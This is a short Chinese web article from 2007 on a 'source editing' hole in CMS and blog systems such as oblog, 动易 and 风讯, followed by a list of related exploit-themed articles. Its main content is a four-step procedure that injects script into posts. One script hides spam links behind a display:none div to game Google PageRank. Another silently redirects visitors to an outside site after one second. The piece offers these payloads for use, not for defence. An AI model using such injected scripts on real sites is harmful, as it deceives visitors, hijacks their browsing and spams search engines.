关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析
更新时间:2007年01月16日 00:00:00 投稿:mdxy-dxy
这篇文章主要介绍了关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析
目前的oblog、动易、风讯等一系列著名的系统,都存在源码编辑漏洞。
具体操作是:
1,进入"源码"编辑
2,输入阶段公分四段:
第一段:<此处输入正文,做事需要手下留情嘛,来点实际内容>
第二段:<script>document.write(’<div style="display:none">’);</script>
第三段:<此处输入作弊链接,获取google的pr值,此处的内容将不会被浏览者看 到,且不会被搜索引擎发现>
第四段:<SCRIPT>window.setTimeout("Timer()", 1000);function Timer(){document.location=’http://31u.net’;}</SCRIPT>
也可以不设置时间或将时间设置为0,那么点击该页面后将直接跳转到指定页面。
相关文章
PJBlog存在SQL注入漏洞大家要快下补丁了...2007-12-12
IP Spoof技术介绍(IP 欺骗)...2007-01-01
漏洞漫舞的飞骋...2007-01-01
一种可以穿透还原卡和还原软件的代码...2007-01-01
关于9行代码导致系统崩溃的分析整理...2007-01-01
一些收集到的经典漏洞详解...2007-01-01
ETP 留言本v1.5爆出漏洞及利用方法...2007-01-01
前言:这种利用类型的攻击早在06年就被安全研究人员指出,不过一直没有在国内重视。而由于我们国内大部分站点正是这种有漏洞的字符集,所以影响还是比较大,希望各大站快速修复。可以看看http://applesoup.googlepages.com/。2008-06-06
88red生成htm静态页面企业建站系统后门利用代码,用88red做企业占的朋友可要注意了2008-05-05
如何寻找自己的UNIX肉鸡(图)...2007-01-01
最新评论